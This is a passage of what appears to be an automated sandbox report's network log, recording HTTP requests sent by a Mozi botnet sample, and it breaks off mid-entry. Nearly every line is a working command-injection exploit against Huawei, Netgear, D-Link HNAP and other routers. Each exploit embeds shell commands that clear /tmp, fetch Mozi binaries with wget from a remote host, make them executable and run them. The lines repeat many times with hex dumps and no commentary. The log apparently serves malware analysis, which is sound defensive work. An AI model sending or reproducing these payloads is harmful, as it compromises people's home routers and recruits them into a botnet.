4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 166.224.99.55:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 69.240.70.143:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 103.109.37.35:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 193.118.137.92:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 116.234.222.211:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 43.157.71.205:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 120.154.2.119:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 185.141.241.150:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 